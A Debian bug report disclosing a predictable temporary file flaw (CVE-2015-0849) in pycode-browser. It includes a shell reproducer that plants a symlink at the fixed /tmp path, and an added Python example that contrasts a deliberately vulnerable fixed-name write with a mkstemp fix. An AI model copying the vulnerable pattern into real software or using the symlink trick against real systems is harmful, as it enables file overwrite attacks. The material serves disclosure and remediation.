Package: pycode-browser
Version: 20120614+git+b041dd2-8
Severity: normal
Tags: security

pycode-browser has a predictable temporary file vulnerability.

When following the steps below, it uses the predictable
temporary file /tmp/pycode-0007-0007.py and will overwrite its contents.
You can reproduce this with the attached script by running
"./test-pycode-browser pycode-browser" and following the steps.

* Launch pycode-browser (with or without the script).
* Open one of the test programs.
* Modify it in some way.
* Do not save the file.
* Click the Execute button.

The program will write the contents to the temporary file.  Upon
exiting, the script will report that the program is vulnerable.  The
vulnerability is ameliorated by fs.protected_symlinks, but systems
running without that enabled are vulnerable to a symlink attack.

The Debian Security Team has allocated CVE-2015-0849 to this
vulnerability.  I sent an email to upstream but have received no
response, so I'm filing this bug.  No DSA will be issued for this
vulnerability.

-- System Information:
Debian Release: stretch/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.0.0-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=es_US.UTF-8, LC_CTYPE=es_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
#!/bin/sh
# test-pycode-browser: set up temporary file vuln testing
#
# Usage: test-pycode-browser pycode-browser
#
# Plants a symlink at the predictable path pycode-browser writes to,
# runs the program, then checks whether the symlink target was changed.

LINK=/tmp/pycode-0007-0007.py
TEMPDIR=$(mktemp -d)

[ -n "$TEMPDIR" ] || exit 1

# Known contents at the symlink target, plus a hash to detect changes.
printf '%d exploit test\n' $$ > "$TEMPDIR/exploit"
sha384sum "$TEMPDIR/exploit" > "$TEMPDIR/hash"

# Point the predictable temporary file name at our target.
ln -s "$TEMPDIR/exploit" "$LINK" || { rm -r -- "$TEMPDIR"; exit 1; }

"$@"

# If the program followed the symlink, the target no longer matches.
if sha384sum -c "$TEMPDIR/hash" >/dev/null 2>&1
then
        printf "Program is not vulnerable.\n"
else
        printf "Program is VULNERABLE!\n"
fi
rm -f -- "$LINK"
rm -r -- "$TEMPDIR"

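The pattern behind the report, and the fix a maintainer would apply, as an added illustration in Python (pycode-browser's own language). This is not pycode-browser's code or the reporter's script: run_code_predictable mimics a fixed, guessable name under a shared directory opened with plain 'w', and run_code_safe replaces it with tempfile.mkstemp, which picks a random name and creates the file with O_CREAT|O_EXCL and mode 0600, so a symlink planted in advance cannot redirect the write. simulate_symlink_attack replays the attached script's symlink trick inside a private mkdtemp directory; because that directory is not sticky and world-writable, fs.protected_symlinks does not apply there, which makes the demonstration deterministic. The file name, the "victim" target and the sample source are constructed for the example.

```python
"""Predictable temp-file symlink attack beside a hardened alternative.

Added illustration only; not pycode-browser's code. The vulnerable
function copies the pattern the bug report describes (guessable name
under a shared directory, opened with 'w'); the hardened one uses
tempfile.mkstemp (random name, O_CREAT|O_EXCL, mode 0600).
"""
import os
import tempfile


def run_code_predictable(tmp_dir, source):
    """Vulnerable: writes to a guessable name and follows any symlink there."""
    # Name taken from the bug report; assumed fixed per program instance.
    path = os.path.join(tmp_dir, "pycode-0007-0007.py")
    with open(path, "w") as f:  # O_CREAT|O_TRUNC without O_EXCL: follows symlinks
        f.write(source)
    return path


def run_code_safe(tmp_dir, source):
    """Hardened: random name, exclusive creation, owner-only permissions."""
    # mkstemp opens with O_RDWR|O_CREAT|O_EXCL, so an existing entry
    # (including a symlink) at the chosen name makes it retry another name.
    fd, path = tempfile.mkstemp(prefix="pycode-", suffix=".py", dir=tmp_dir)
    with os.fdopen(fd, "w") as f:
        f.write(source)
    return path


def simulate_symlink_attack(runner):
    """Return True if `runner` overwrote the attacker's target file.

    Mirrors the attached shell script: plant a target file with known
    contents, put a symlink at the predictable name pointing to it, run
    the program, and see whether the target changed. Everything lives in
    a private mkdtemp directory (mode 0700, not sticky), so the kernel's
    fs.protected_symlinks restriction does not interfere with the demo.
    """
    base = tempfile.mkdtemp()
    try:
        target = os.path.join(base, "victim")  # constructed attacker target
        with open(target, "w") as f:
            f.write("original contents\n")
        os.symlink(target, os.path.join(base, "pycode-0007-0007.py"))
        runner(base, "print('hello')\n")  # constructed sample program
        with open(target) as f:
            return f.read() != "original contents\n"
    finally:
        for name in os.listdir(base):
            os.unlink(os.path.join(base, name))  # removes links, not targets
        os.rmdir(base)


if __name__ == "__main__":
    print("predictable name overwritten:", simulate_symlink_attack(run_code_predictable))
    print("mkstemp name overwritten:    ", simulate_symlink_attack(run_code_safe))
```

The check that matters is the open flags, not the directory: on a system without fs.protected_symlinks the plain 'w' open in /tmp behaves exactly as it does in the private directory above, while O_EXCL creation refuses to go through a pre-existing symlink regardless of the sysctl.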